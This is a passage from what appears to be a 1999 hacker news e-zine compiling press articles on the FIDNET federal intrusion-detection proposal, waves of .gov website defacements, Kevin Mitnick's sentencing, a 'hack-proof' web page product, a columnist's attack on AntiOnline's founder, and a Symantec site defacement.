Markoff broke the Big Story: a National Security Council draft proposal will put the FBI in control of "a sophisticated software system to monitor activities on non-military Government networks, and a separate system to track networks used in crucial industries." Ghastly. The body to be created will be called the Federal Intrusion Detection Network, or FIDNET. Big Brother by another name, no doubt. Libertarian alarmists and conspiracy paranoiacs dropped their daily meds and rose angrily, if unsteadily, to arms. "The plan... specifies that the data [FIDNET] collects will be gathered at the National Infrastructure Protection Center (NIPC), an interagency task force housed at the Federal Bureau of Investigation," the Times went on, adding that "the plan strikes at the heart of a growing controversy over how to protect the nation's computer systems while also protecting civil liberties -- particularly since it would put a new and powerful tool into the hands of the FBI." But it so happens that The Register has its own copy of the draftt proposal, and unlike the New York Times, we've actually read ours. Let's just have a peek at the text. The first observation we make is that the text states plainly, "the GSA (General Services Administration) is responsible for establishing the FIDNET Program Office: this includes creating an interagency management team from the defence, intelligence, technical, legal, and law-enforcement communities." According to our reading, FBI's NIPC team will come in later, when FIDNET data gathered by the GSA suggest criminal activity. Again we take the unconventional approach of consulting the text: "FIDNET will provide raw/filtered data from network sensors and the Federal Computer Incident Response Capability. NIPC will continue to be responsible for further data processing." We remain at a loss to explain why the NYT reported that FIDNET would "put a new and powerful tool into the hands of the FBI." On the contrary, it appears that the Bureau's NIPC will be a tool of the GSA, if and when it decides the government has been cracked. Michael Vadis, FBI's Director of NIPC, made it clear during testimony to the Senate Y2K Committee yesterday that the FBI will respond only where there is evidence of a federal crime. The only language we found in any way alarming was, "FIDNET will interface with the currently planned intrusion detection systems being developed for DOD (Department of Defence) and national security agencies." We didn't quite know what the pseudo-verb "interface" was intended to mean, but we know that American law enforcement and the military are forbidden to do a great deal in the way of "interfacing". As the very existence of America's Act of Posse Comitatus indicates a history of some difficulty in distinguishing between civil and military purviews, this little snippet naturally raised our eyebrows. On this matter the Department of Justice computer crimes division declined to be helpful. The level of interdependence between military and non-military bodies being contemplated is indeed a controversial issue, but it seems unlikely that the final product will initiate military involvement in civilian affairs enough to invite a popular backlash. Elections are coming up, after all; and the FIDNET system will present itself as a tempting target for cyberterrorists if its management becomes odious, thereby having the ironic effect of decreasing security for government systems. Assuming that the language of the proposal does get tidied up a bit, we can expect a much softer line in reference to DOD's role in FIDNET. This still leaves the matter of DOD participation in case of an emergency. The president is permitted by law to suspend the Act of Posse Comitatus in difficult circumstances, such as insurrection, mayhem in the streets, foreign invasion, or those the Y2K rollover might possibly present. A further bit of constitutional intrigue will undoubtedly emerge if a foreign military organization should attack a US civilian network related to banking, energy, transportation or some other essential service. It does not necessarily follow that the DOD would need access to civilian networks in order to reply on behalf of the USA. Vadis for one thinks an organised attack is inevitable. He declined to go into specifics, but left us with the strong impression that hostile military bodies overseas are developing the means to disable military, government and civilian networks remotely via an internet-based attack. Clinton's National Security Advisor, Sandy Berger, said on Thursday that there exist "governments that we know are developing systems to get access to our computer systems." Not an especially comforting thought. "We know that, in fact... there have been intrusions into sensitive systems," Berger added. Whether or not such an attack is being planned, it is certain that the US government expects one. We wonder if the increased level of connection among government systems needed for FIDNET to monitor them effectively might not lead to increased vulnerability. Whether it happens, or when it happens, it is sure to be a jurisdictional nightmare; and the FIDNET proposal does foreshadow that confusion with its own vague language. A crucial point here is that the proposal leaked to us is in draft form and now seven weeks old. The Register's contact on the White House National Security Council, who goes by the name of "an administration official," made it clear that the final draft will not be ready for submission to the President until September at the earliest. The FIDNET document is at present quite fluid, and on its way past numerous reviewers including the Department of Justice computer crimes division, the General Services Administration, the Department of Defence, the National Security Council and the FBI. Furthermore, our source at NSC tells us, the proposal currently being circulated does address and tighten up the unfortunately vague "interface" language. The level of involvement between DOD and non-military government agencies is intended to be little more than an advisory relationship and a sharing of new quirks, bugs and attack techniques much as "one police department might share tips with another in a different jurisdiction." The language which led to an assumption by many that FIDNET might one day monitor private-sector networks is also being clarified. NSC says that there will not be even an opt-in programme for private users to voluntarily choose such monitoring. FIDNET will, however, share its tricks with private enterprise, and leave it to them to implement what it chooses, on its own nickel. The Register will report fully and eagerly on the specific changes to the FIDNET proposal as soon as the latest version is leaked. It might actually make sense to withhold judgment on the piece until after it's been reviewed and polished. Just a thought. ® -=- Federal Computer Week; AUGUST 2, 1999 Officials: Security plan on track In the face of privacy concerns, schedule remains unchanged BY DIANE FRANK (diane_frank@fcw.com) Despite public outcry and congressional interest, federal officials are sticking to their schedule for developing and releasing a plan to protect the federal information infrastructure from cyberattacks. Several stories in the media last week inaccurately reported that the draft of the National Plan for Information Systems Protection would put the FBI in charge of monitoring private-sector and government networks for cyberattacks through the Federal Intrusion Detection Network (Fidnet). This touched off protests from public-interest groups about citizens' privacy, and several members of Congress asked for a complete copy of the draft and a briefing in the next few weeks. Officials from the Critical Infrastructure Assurance Office (CIAO), the National Infrastructure Protection Center and other high-level federal groups involved in creating the plan said the attention to what is still an internal document under development will not change anything. "This will have no effect on the process," one senior National Security Council official said. "It is just now completing the second round of comments from the agencies and industry...and will be brought to the president in October." Others stressed that the plan deals only with federal networks and that the privacy and civil rights of Americans are being taken into account at every step. "An important element of the Fidnet program is a legal review by the Justice Department," said John Tritak, director of the CIAO. The plan also is being reviewed by the chief counselor for privacy at the Office of Management and Budget's Office of Information and Regulatory Affairs, and those reviews may change the current version of the plan, he said. In fact, the first version of the plan has already been reviewed by the Office of the Assistant Attorney General, which determined it was completely legal, according to a senior DOJ official. The plan is based on the critical infrastructure protection plans from agencies and industry required by Presidential Decision Directive 63 and originally was scheduled to be sent to Congress and the president this fall, Tritak said. It also includes programs for education and training of information security professionals, research and development of computer security profits, and the basis for revisions of current laws to "promote greater information sharing, enhance systems security, and strengthen protections for civil liberties and privacy." Although members of Congress has known about the plan for some time, most did not realize its extent, and that is partly what touched off a request from Sen. Bob Bennett (R-Utah) to receive a copy of the plan, said a spokesman for the senator. @HWA 12.0 Computer `crackers' set sights on .gov for chaos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by D----Y http://www.businesstoday.com/techpages/hack08011999.htm Computer `crackers' set sights on .gov for chaos by Mark Mueller Sunday, August 1, 1999 It was the kind of threat for which computer hackers are famous, a declaration of war dripping with the risk-free bravado so common on the anonymous Internet. The warning, which appeared on a hacked Web page of the U.S. Interior Department in late May, promised unrelenting attacks against government computers to avenge an FBI roundup of hackers associated with the group Global Hell. Just weeks earlier, Global Hell had claimed responsibility for an attack on the White House's main Web page. ``Now, it's our turn to hit them where it hurts by going after every computer on the Net with a .gov,'' the message read. ``We'll keep hitting them until they get down on their knees and beg.'' That the threat was made - risking the pique of the FBI - isn't as surprising as the follow-through. In recent months, hackers, or crackers, as bad-guy hackers are known, have indeed blazed through a wide swath of government and university computers, defacing some Web sites and shutting down others. Among the high-profile targets: the U.S. Senate (twice), the Army, the Navy and the Departments of Agriculture, Labor and the Interior. Computer systems also were hit at Georgetown University, the University of Colorado, the University of Michigan and Harvard University. The most brazen of the attacks targeted the lion's den itself: the FBI Web page, which was out of service for nearly a week as programmers beefed up security on the site. Jim Settle, former chief of the FBI's computer crimes squad and now an Internet security consultant, calls the FBI strike ``an out-and-out declaration of electronic warfare.'' For some, it's a war that can't afford to be lost. The feeble network that once was the domain of a few scientists is now a robust and far-reaching behemoth that caters to hundreds of millions of people, some of whom pay their taxes, buy goods and send intensely personal information through their computers. In the wrong hands, such information could prove embarrassing or costly. Seen in its most sinister light, computer intrusion is a threat to national security. But the self-proclaimed ``warriors'' who carried out the recent attacks against government Web sites hardly sound like cyberspace shock troops. Their loose-knit groups bear names like the ``Keebler Elves,'' the ``Masters of Downloading'' and ``Hacking for Girlies.'' When they hack sites, they traditionally leave behind inane scrawlings - ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends. Those familiar with the hacking subculture say such groups are generally composed of teens - and occasionally people in their early 20s - with a lot of computer equipment and too much time on their hands. ``These are just immature kids doing this from their home computers,'' said John Vranesevich, founder of Anti-Online, a group that tracks hacker activity and that has compiled dossiers on 6,000 hackers. ``It's a game to them. They make a move, and they can't contemplate how it affects people in the real world. It's not reality until the FBI bangs on their door.'' Vranesevich called the recent wave of attacks a ``temper tantrum'' over the May FBI raids, in which agents confiscated computer equipment and questioned teens in 11 cities, including Houston, Seattle and San Diego. A spokeswoman for the FBI in Boston said the New England office was not involved in the operation. Those who deface Web sites - about 1,300 sites have been defaced so far this year, according to the most reliable statistics - justify their actions by arguing they're actually doing companies and organizations a service by pointing out security deficiencies. But law enforcement authorities and others who deal with hackers dismiss the argument. ``I don't buy it,'' said Drew Williams, the founder of an AXENT Technologies' SWAT team to deal with hacker attacks. ``Any hacker group that has not been invited to test security is committing a crime.'' That assessment is shared by David Green, deputy chief of the computer crimes and intellectual property section at the Justice Department. ``This is not just electronic graffiti,'' Green said. ``They're shutting down access to Web sites, sometimes for hours, sometimes for days, and it makes it impossible for people who want access to that Web source to get it.'' Moreover, there's far more at risk than down time for Web servers, contends Peter Mell, who conducts hacker research for the National Institute of Standards and Technology, a division of the U.S. Commerce Department. ``Real harm can be done,'' Mell said. ``A lot of people download their tax forms from the IRS today. What if someone broke into the IRS Web server and changed just a single number? It would cause supreme chaos.'' Mell also pointed to electronic banking and stock trading, saying Web servers today handle increasing amounts of sensitive information. ``This isn't child's play anymore,'' he said. ``I pay my bills online. I trade stocks online. In that kind of environment, I can't afford people breaking into computers.'' The FBI heartily agrees, though it has not characterized its crackdown on hackers in quite the grandiose terms that hackers do. ``We don't have a war against hackers. We're following our mandate, which is to investigate violations of federal law,'' said Bill Carter, a spokesman for the FBI's headquarters in Washington. ``The fact that these hackers or hacker groups have their noses out of joint over this, we can't help that.'' Most hackers are not caught, but the recent raids suggest the FBI is starting to get better at tracking them. The agency has about 500 open computer crimes cases at any given time. But the federal agents' methods - charging in with warrants and bulletproof vests - worries some in the hacking community. ``For those of us in the scene for a number of years, it's starting to get scary only because we worry it's going to turn into a witch hunt,'' said Space Rogue, a member of the Boston-area group L0pht Heavy Industries, a former hacker clan that now bills itself as an electronic think tank. ``While defacements will probably continue no matter what law enforcement officials do, it would be very easy for the government to just start executing search warrants left and right, seizing computers and scaring people half to death.'' Internet watchdogs - and some hackers themselves - say that while the crackdown should continue, the real issue is computer security. Space Rogue argues that nearly all Web page defacements are carried out with known security flaws in software. As an example, he said, his group e-mailed the Army's webmaster about a flaw in its ColdFusion server software a month before someone used the hole to hack into the Army's Web site. ``It comes down to the person in charge of the machine and whether they're taking their security seriously,'' Space Rogue said. ``This sort of thing never should have happened in the first place.'' Settle, the former FBI computer crimes chief, says the danger will be far greater when those doing the hacking aren't teens out for kicks but terrorists intent on electronic warfare. ``Our computer systems today are like cars operating without safety equipment: no headlights, no bumpers, no airbags, no roofs,'' he said. ``Heck, if teenagers can do this, what can sophisticated intelligence operatives do? This is just a taste of things to come.'' The government acknowledges as much. In testimony before a congressional panel, government security experts said government computers are easy marks because employees lack training, because well-trained staff flee for the bigger paycheck of the private sector and because internal security procedures often aren't followed. ``Most federal agencies continue to lack the ability to detect against and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.), chair of the House Science Subcommittee on Technology, said at the June 23 hearing. To combat the deficiency, the Clinton administration last week proposed spending $1.5 billion in the next fiscal year on a sophisticated intruder warning system that would be installed on military, government and private-sector computer networks by 2003. Operating something like a burglar alarm, the system would detect break-ins, funneling that information to a central location. ``A concerted attack on the computers of any one of our key economic sectors or governmental agencies could have catastrophic effects,'' Clinton wrote in a draft cover letter accompanying the proposal. Civil libertarians and Internet privacy watchdogs already have protested the plan, saying it will give the government unprecedented surveillance powers, equipping authorities with the tools to peruse the private dispatches of the masses. House Majority Leader Dick Armey (R-Texas) joined in the criticism, deriding the plan as an opportunity for ``government peeping toms.'' No matter the government response, hackers will, no doubt, continue mounting challenges, probing for deficiencies in networks and deriding those who chase them. ``You can stop one, but you can not stop all,'' hackers wrote when they defaced the U.S. Senate Web page for the second time in late June. A more recent defacement of an obscure Venezuelan Web page repeated the theme, carrying a ``call to arms'' imploring competing hacker groups to unite to ``win this war.'' ``Remember, this is our world, not the government's,'' the page read. Time will tell. Prosecuted `cracker' a martyr to techies In hacker circles, he is a modern-day martyr, a technological tinkerer whose attacks on other people's computers amounted to harmless exploration before the FBI swooped down on him, dubbing him Online Enemy No. 1. To prosecutors and to judges, he is a dangerous miscreant whose ability to crack computer systems and whose propensity for running from the law required that he be held without bail. Kevin Mitnick, for four years the cause celebre of the Internet's dark side, could soon be going free. Mitnick, 35, who pleaded guilty in March to multiple counts of computer and wire fraud for breaking into systems and stealing software from such companies as Sun Microsystems, Novell, Motorola and Nokia, will be sentenced Aug. 9 under a plea agreement that could, with good behavior credits, allow him to leave federal prison within weeks. ``Kevin is optimistic that this case will be over and that he can get on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa Monica, Calif. But even if Mitnick himself fades into obscurity, his cause is unlikely to follow. In the hacking community, Mitnick long ago became a symbol of what hackers term gross government over-reaction, a theme repeatedly hammered home by Randolph. ``The government prosecution of Mr. Mitnick was to carry out an agenda launched by them in the 1990s,'' Randolph said. ``The government wanted to demonstrate they were going to be tough on computer terrorism. Unfortunately, the government did not have a bonafide computer terrorist to prosecute, so they went after Mr. Mitnick, a recreational hacker who was arrested with a big splash and who became a convenient target.'' Randolph's comments could be dismissed as the arguments of a defense lawyer looking to gain sympathy for his client, but he's not the only one making them. Drew Williams, who founded Axent Technologies' SWAT team to respond to hacking incidents for clients, said the government miscalculated with Mitnick. ``I am not a Mitnick supporter at all. However, I think the government did in fact set out to make an example and instead made a martyr,'' Williams said. ``An individual's rights to due process probably got a little trampled.'' Denied bail on charges that could have initially landed him in jail for a century, Mitnick appealed all the way to the U.S. Supreme Court, where the justices declined to hear his lawyer's argument that bail should be set. Hackers have seized on the bail issue, leaving ``Free Kevin'' messages on the Web sites they hack. Recent examples include the home pages of the U.S. Senate and Greenpeace, where hackers left the tongue-in-cheek message ``Free Mitnick or we will club 600 baby seals.'' There is also a ``Free Kevin'' Web site (www.freekevin.com) that gives Mitnick updates and carries a confinement clock showing - to the second - how long Mitnick has been jailed. Randolph argues that while people should be prosecuted for breaking into systems, the law needs to be refined to distinguish between recreational hackers and information terrorists. ``I do not quarrel at all with the government's right to prosecute computer fraud and to go after computer terrorists, but it's high time they distinguish between high crimes and misdemeanors so they're not trumpeting the arrest of the century when the suspect is a kid on a laptop,'' Randolph said. Mitnick's prosecutors insist they have not overreached, that Mitnick caused millions in damage by stealing and changing information in computer systems. ``This is someone whose conduct over a 2-year period was very broad and very serious,'' Assistant U.S. Attorney Christopher Painter said. ``He hit a huge number of companies with a lot of damage. He is not the victim.'' If Mitnick does win his freedom soon, it could be short-lived. The Los Angeles County District Attorney's Office is preparing its own case against him on charges similar to the federal claim. Randolph said he's confident Mitnick, in the end, will prevail. ``In 1995, the press and the public were fooled into thinking Kevin Mitnick was this cyber bogeyman,'' he said. ``That type of argument doesn't fly in 1999. People know better.'' Sites that have been targeted Here's a partial list of Web sites that have been attacked in recent months. In most cases, the sites were defaced. In others, a flood of requests for service overwhelmed Web servers, rendering them unusable. In several of the attacks, the intruders called the acts revenge for FBI ``harassment'' of hackers. Bell South eBay (on-line auctioneer) FBI Fort Monmouth (N.J.) U.S. Army Garrison Georgetown University Harvard University Idaho National Engineering and Environmental Laboratory (conducts research for the U.S. Department of Energy) Illinois Comptroller's Office NASA Goddard Space Flight Center National Oceanic and Atmospheric Administration Storm Prediction Center State of Virginia home page University of California-Davis University of Colorado University of Michigan University of Wisconsin U.S. Army main Web site U.S. Coast Guard U.S. Department of Agriculture U.S. Department of Education U.S. Department of the Interior U.S. Department of Labor U.S. Information Agency U.S. Navy U.S. Senate (twice) The White House @HWA 13.0 IIS Server 'hackproof'? ~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid A small company in Sydney Australia, called Creative Digital Technology, has claimed to have created software that will make web pages on IIS Servers 'hack proof'. The software, known as SecurePage digitally signs all pages and then compares those signatures against encrypted master copies. If the signature changes then the web server will stop serving the page. They have issued a challenge to get people to try and break the system, however, the information on the challenge is difficult to find. The Australian http://technology.news.com.au/techno/4108922.htm Internet News http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html Creative Digital Technology http://www.creative.com.au/ Developer issues hacker challenge By JENNIFER FORESHEW 3aug99 A SMALL Sydney company that has developed software designed to make Web sites hack-proof, has thrown out a challenge to crack the technology. Creative Digital Technology (CDT) has developed software which, when downloaded, makes a site secure. "We are prepared to stand behind that financially by offering a prize to universities to see if they can do what our developers haven't been able to do," CDT chief operating officer Philip Burton said. CDT, which developed the country's first SET (Secure Electronic Transaction) enabled products, is launching the SecurePage product at Internet World 99 this week. "We can protect any Web site," CDT chief executive Bahram Boutorabi said. "The first version of the product runs on Microsoft's Internet Information Server platform, but we are planning to roll out across all platforms." Mr Boutorabi, who is also technology officer, said many sites could be hacked because they were developed using mostly straight text. "We have developed the technology to put something into Active Server Pages, HTML, Net Commerce Mark-up Language and XML, which represents a signature that someone has made against that page," Mr Boutorabi said. Any attempt to alter a Web site's content would result in action being taken by the system, which is protected by 192-bit, Triple-DES encryption. "If the contents of that page have been altered for any reason it will stop serving that content out and serve it from its own content area, where everything is fully encrypted," Mr Boutorabi said. "SecurePage enables an administrator to put a disc into the system, run the administration and tell it to sign all of the pages with their password. "To alter the code or text, you have to have administrative access to change the content or to stop the system." Mr Burton, who is also a senior partner in CDT, said the company began working on the technology after attacks on high-profile Web sites. "This came about from evidence that significant Web sites were being hacked and destroyed. "We believed we could deliver a protection device in software form that could be downloaded from our Web site by whoever was hosting that particular site. CDT declined to reveal further details of the technology pending approval of a patent on SecurePage. If you decide to take up CDT's challenge to crack its software, Computers & High Technology wants to know. E-mail us at auscomp@ozemail.com.au – but only if you are successful. Internet News http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html Australian Web Innovations Debut at IW Sydney August 4, 1999 By Gerard Knapp InternetNews.com Australian Correspondent International News Archives [Sydney, AUSTRALIA] Several Australian companies have used the Internet World Australia 99 exhibition to launch new products. Sydney-based startup Pure Commerce has introduced Pure Global Pay, a payment gateway service which can accept 32 different currencies without merchants needing to establish relationships with non-Australian banks. E-commerce developer Creative Digital Technology is debuting two software applications: a wallet which supports the Secure Electronic Transactions (SET) standard for e-commerce transactions called ActiveWallet, and a solution for attempts by hackers to deface corporate Web sites called SecurePage. The ActiveWallet client is an 850KB client-side applet which enables consumers to pay bills and buy products using credit cards in a drag and drop environment. The client is designed to support transactions using the SET-certified merchant server technology of US-based GlobeSet. SecurePage attaches digital signatures to static Web pages and dynamically generated components so that they can be compared against an encrypted master version to check if they have been altered by malicious hackers. Allaire has also used Internet World as its Australian launch for Spectra, its Web content management product. The show has also coincided with the announcement that US-based analyst firm Jupiter Communications had filed preliminary documents for an IPO. Wednesday keynote speaker Gene De Rose, who is CEO and 21.8 per cent stake holder of Jupiter, is poised to become the next Internet multi-millionaire. The Internet World 99 Best of Show product awards, judged by journalists at Internet World Australia magazine, will be announced on Wednesday. 14.0 Latest CWD Pokes at AntiOnline ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The CyberWire Dispatch, a mailing list newsletter, has some very interesting things to say about John Vranesevich and Antionline. CWD writer Lewis Z. Koch makes some powerful observations about his past dealings with and the writings of Mr. Vranesevich. (If you have been following the antics of AntiOnline at all this is a must read piece.) CyberWire Dispatch- republished with permission Note: CyberWire Dispatch is a mailing list only newsletter. It is reprinted here with permision. Subscription information is at the end. CyberWire Dispatch // August 1999 // All Rights Reserved Jacking in from the "Pine-Sol" port: By Lewis Z. Koch CWD Special Correspondent Twenty-year-old John Vranesevich calls his AntiOnline Web site "a valuable tool in the fight against 'CyberCrime'" In a call to arms, this self-anointed, junior G-man wannabe, promises to uncover, reveal and inform on hackers and other miscreants. Out of this misguided cyber-vigilantism, arises the "denunciator" virus, which reaches its full lethality in totalitarian states but also finds a home in democratic societies as well, usually in climates of social resentment, political fanaticism, or, my personal favorite, political self-righteousness. The Denunciator virus, known also as the "Accuser" virus, destroys careers, leaves permanent scars, called "blacklists," gives rise to false alarms, warnings or contrived "cautionary tales" meant to lull or divert citizens. The natural host for this virus is believed to be a species of the rodent called a "snitch," aka squealer, stool pigeon, informer; rat bastard. Every delusional crusader needs a mission statement, Vranesevich is no different. This self-anointed sheriff-of-cyberspace pens this Uber-warning to hackers: "I know that some of you are playing what you feel is a game. A game that you think you are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet are careful not to provide enough information to actually have it proven. I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are." And if you're keeping score-and you should be-you'll note that Vranesenvich apparently started down this crusader road at the tender age of 15 or just about the time he figured his Johnson could be used for more than simple utilitarian bodily functions. This not-very subtle paean to cyber-vigilantism could easily be dismissed save for the fact that Vranesenvich has earned a demi-celebrity status from journalists working for publications from which we have come to expect more judicious sourcing, including, but not limited to, Matt Richtel of The New York Times, John Schwartz of The Washington Post and even, sadly, CWD's own Brock Meeks while cloaked in his alter-ego as Washington correspondent for MSNBC. And we wonder why fewer and fewer people trust the media. Hung With His Own Rope ===================== In his mission statement Vranesevich unequivocally states, "I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers." Question is, can we believe him? There's his rather perplexing story about hackers breaking into an "Israeli" atomic research center. At first, as Vranesevich tells it, when hackers told him what they had done, he "freaked" even thought the boast might be "far fetched." But these hackers sent him a "folder full of documents written in a foreign language" they claimed they had copied from the "B'Hadvah" Atomic Research Center. [Note: Vranesevich didn't know how to spell the name of the so-called research center]. "Were the documents in Hebrew or English?" I asked. "Bengali." When he broke the "story" on his AntiOnline web site, all media hell broke loose. "Every mainstream media started calling and questioning and calling the research center," Vranesevich said. "I had all these nuclear arms proliferation people calling. Here I am in my parent's living room, and one day, thirteen calls from anti-nuclear proliferation and pro-nuclear proliferation (sic) groups wanting to know - is this significant, what is Israel doing?" I was still having a problem with the "Bengali" aspect to the documents. "Ah, John," I asked, "is this an Israeli research center or could it be Indian? Pakistani?" Silence. Then Vranesevich said, "I think it's Indian. Who was the one that just did the nuclear testing?" "That was India and Pakistan, not Israel." "Oh, then this was India, not Israel." Oh. Then there's his story about changing medical records-pretty serious stuff. Can we take him at his word there? "[I]'ve seen people change the medical records of individuals in our armed services" Vranesevich asserts in his "mission" statement. When asked about these nefarious deeds, Vranesevich works himself up into a high dudgeon about hackers breaking into sites and changing medical records. "What would have happened if medical records had been changed and a cancer patient received the wrong treatment for it?...What if I had looked into who these [hacker] guys were, a little further? What would have happened if I would have published the story? What would have happened if CERT had come out and said medical records had been changed and a cancer patient received the wrong treatment because of it!" I questioned him closely. "You really saw people change the medical records of individuals in our armed forces?" "I don't mean that literally," backtracking as fast as his voice could carry him. "You see the language I was using? I don't mean literally 'I saw them do it, I saw it happen.' It's something that transgressed (sic) before. It's like we saw our country go through three wars. It doesn't mean I caused (sic) the three wars. You see what I'm saying? Or I've seen crime happen over and over again in my neighborhood. Doesn't mean I literally saw it. You know what I mean? I don't know if I'm making myself clear." Ah, er.. right. He gave it one more chance. "Looking back in retrospect (sic). It was like actions that transgressed (sic) before. I've sort of watched the events transfold (sic) before my eyes." Yep, that clears it up; someone get this guy an English tutor...There's more like that but after a while it gets, well, boring. Vranesevich also claims a "semi-contractual" relationship with all kinds of official military and police types, including one with the NASA and one with the Defense Information Systems Agency (DISA). Can we believe him? NASA says no. After checking with their databases "they could find no record of NASA having done business with Mr. Vranesevich or his company AntiOnline," reports Patricia M. Riep-Dice, NASA Freedom of Information Act Officer. According to a DISA spokesman, no such relationship exists. None. Nada. In Other People's Words ======================= In his grasp for distinction, celebrityhood, acclaim, Vranesevich overreaches, as he did with his claim of unethical behavior on the part of computer security expert Marcus Ranum. Ranum's "crime"? "Guilt-by-association" with two hacker groups, L0pht Heavy Industries and cult of the Dead cow (cDc). L0pht Heavy Industries is among the finest Microsoft error-catchers in the world; it is a company with employees and it pays taxes. "cult of the Dead cow" is a group of hackers in the tradition of Yippie founders Abbie "Steal This Book" Hoffman and Jerry Rubin. The cDc promises Internet chaos, anarchy and terror; in 1968, in Chicago, Abby Hoffman and Jerry Rubin threatened to pour LSD in the water and send Yippie studs to O'Hare airport to seduce the wives of delegates to the Democratic National Convention. If that analogy is lost on you, cut your losses now, stop reading and return to your "Internet for Dummies" workbook. L0pht and cDc tend to despise Microsoft, but then so do a lot of people, including folks in the Justice Department. More than likely there is cross-over contact between L0pht and cDc since the two have much in common, in the same way journalists from different newspapers and television tend to hang out at the same bars, buy each other drinks and complain about stupidity and venality of their editors. cDc had been tinkering around the multiplicity of holes, vulnerabilities and general screw ups in the Microsoft Windows operating system. They developed a back-dooring program for Win 95, one that allowed a Trojan Horse to exploit that vulnerability. In a stroke of genius that would make an Wizard of Madison Avenue green with envy, they dubbed the program "Back Orifice." Ranum developed a program to counteract Back Orifice and called it "Back Officer Friendly." Vranesevich claims he was "shocked, shocked" to discover that Ranum might have had conversations with hackers at L0pht, perhaps even some at cDc about Back Officer Friendly. Vranesevich's story alleged that Ranum could have even been talking with the very people at cDc who developed the exploit in the first place. So what do we have here? Collusion? Duplicity? Ethical lapse? Double-agentry? Whom to believe? ================ Bell Labs' William R. Cheswick, co-author with Steven Bellovin of the exemplary "Firewalls and Internet Security - Repelling the Wily Hacker," says of Ranum: "I have worked with Marcus for years. He is a strong force for Good against Evil. A security person is paid to think bad thoughts, and Marcus is quite good at it. The key is that he doesn't do the bad stuff, but uses this approach to make things safer." Bellovin, himself a world-class computer expert, certainly doesn't equivocate. Ranum has "been a strong, positive force for Internet security, both in the sense of building useful tools and in the sense of teaching other people important principles. I've also never heard any serious question about his ethics." "Marcus has one of the most fluent understandings of Internet security I have ever seen," says Bruce Schneier, whose books on encryption and on privacy can trigger a physical and intellectual hernia, "his ability to see threats and attacks, defenses and countermeasures, makes him one of the most valuable resources we have in computer security world," Schneier said. Marcus' "association with the L0pht recognizes that there is considerable expertise in the hacking community that can be leveraged in the fight against computer crime. Marcus is just smarter than other people, because he realized it and figured out how to use it No kidding; he's that good." So you do the math: self appointed cybervigilante John Vranesevich, with his stolen "Israeli" atomic secrets written in Bengali, changed medical records that weren't changed, unsubstantiated relationships with NASA and DISA (and that's just for openers), and, on the other hand, Marcus Ranum and people like Cheswick, Bellovin, and Schneier. The best way to deal with "Denunciator" virus is simply silence; don't feed the hype. ======================================== EDITOR'S NOTE: CyberWire Dispatch, with an Internet circulation estimated at more than [500,000], is now developing plans for a once-a-week e-mail publication. Every week, one of five well-known investigative reporters will file for CWD. If you think your company or organization would be interested in more information about establishing an sponsorship relationship with CyberWire Dispatch, please contact Lewis Z. Koch at lzkoch@wwa.com. =================== To subscribe to CWD, send a message to: Majordomo@vorlon.mit.edu No subject needed. In the first line of the message put: Subscribe CWD To remove yourself from this list, send a mesasge to: Majordomo@vorlon.mit.edu No subject needed. In the first line of the message put: Unsubscribe CWD ---- @HWA 15.0 High Profile Sites Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by TurTleX The Jerry Springer Show, Symantec Corporation and even Nellis Air Force Base have all had their pages defaced in recent days. The defaced Symantec page claimed to have left a trojan/worm behind that infected all of Symantec's systems. Symantec denies the charge. Thanks to attrition.org we were able to grab mirrors of the effected sites. HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_409000/409980.stm C | Net http://www.techweb.com/wire/story/TWB19990802S0002 Wired http://www.wired.com/news/news/technology/story/21052.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html Heise Online- German http://www.heise.de/newsticker/data/fr-02.08.99-001/ ZDNet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Symantec: Vandals didn't infect us By Robert Lemos, ZDNN August 2, 1999 2:02 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html Internet vandals broke into the servers of network security and utilities firm Symantec Corp. Monday morning, defacing the company's Web site. While the vandals claimed to have infected Symantec's network two months ago with a worm, quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems. "There is no virus infection, no worm infection, and no danger to customers," said Richard Saunders, a spokesman for the Cupertino, Calif., company. "They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our home page." The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months ago. phear," stated the group in a document of typically spelling-impaired hacker-speak. The document was left behind by the group after it broke into the servers of Symantec at about 5 a.m. PT Monday. Worms are virus-like programs that infect systems through networks automatically and without the need for an unknowing user to open a file or run an application. Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a hard nut to crack. The only difference: This time someone actually got in. "What this incident does show is that you cannot be complacent towards this kind of threat," said Saunders. The Symantec spokesman could not detail how the cyber vandals entered the company's network. Symantec engineers took down the page within an hour of its posting, but not before the media in Europe got wind of the defacement. The BBC posted a story early Monday morning. @HWA 16.0 Off The Hook Goes Shortwave ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Emmanuel Adding to its impressive list of distribution methods "Off the Hook" now broadcasts on shortwave radio. "Off the Hook" is a weekly radio show dedicated to the issues and events of the hacker world. Not only is "Off The Hook" available via commercial broadcast radio, Real Audio and MP3, they will now be broadcasting on shortwave radio as well. You can listen in at 7415khz, Tuesdays at 8 pm EST. Off The Hook http://www.2600.com/offthehook/ @HWA 17.0 Feds Stop Satellite Biz due to WireTaps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code 